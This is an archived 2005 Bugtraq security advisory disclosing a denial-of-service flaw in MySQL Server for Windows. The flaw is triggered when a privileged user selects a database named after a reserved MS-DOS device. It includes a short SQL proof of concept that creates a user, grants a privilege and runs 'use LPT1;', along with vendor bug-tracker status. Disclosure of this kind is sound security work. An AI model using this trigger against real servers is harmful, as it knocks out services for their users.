lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20050315184716.3345.qmail@www.securityfocus.com>
Date: 15 Mar 2005 18:47:16 -0000
From: Luca Ercoli <io@...aercoli.it>
To: bugtraq@...urityfocus.com
Subject: Denial of Service Vulnerability in MySQL Server for Windows




Package: MySQL Database Server for Windows
Auth: http://www.mysql.com/
Version(s): 4.1.XX/4.0.XX/5.0.XX
Vulnerability Type: Denial of Service




Disclaimer:
==========

The information is provided "as is" without warranty of any kind.
The author of this issue shall not be held liable for any
downtime, lost profits, or damages due to the informations 
contained in this advisory.




What’s MySQL:
============

MySQL is a multi-user, multi-threaded relational database management system.
The MySQL database server is the world's most popular open source database.





Vulnerability Description:
=========================


A vulnerability exist in the way application handle requests
containing reserved MS-DOS devices name (AUX,CON,COM1,LPT1 and PRN).
This flaw allows an authenticaded user with at least one of those
privileges globally (on *.*):

- REFERENCES
- CREATE TEMPORARY TABLES
- GRANT OPTION
- CREATE
- SELECT

to cause the service to fail.






Proof of Concept:
================



1- Create an user account:

(connected as 'root')

use mysql; 
INSERT INTO user (Host,User,Password) VALUES('%','customer',PASSWORD('customer'));



2- Grant to him one or more privileges reported above:

(connected as 'root')

GRANT CREATE TEMPORARY TABLES ON *.* TO 'customer'@'%';
flush privileges;


3- Connect to server using new account and 'use' the database 'LPT1':

(connected as 'customer')
use LPT1;







Vendor Status:
=============


 http://bugs.mysql.com/

 ID:               9148
 Updated by:       Miguel Solorzano
 Reported by:      Luca Ercoli
 User Type:        User
 Status:           Verified
 Severity:         S2 (Serious)
 Category:         Server
 Operating System: Windows
-Version:          4.1.9
+Version:          4.1.XX/4.0.XX/5.0.XX














Credits:
---

Luca Ercoli
io [at] lucaercoli.it
www.lucaercoli.it


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ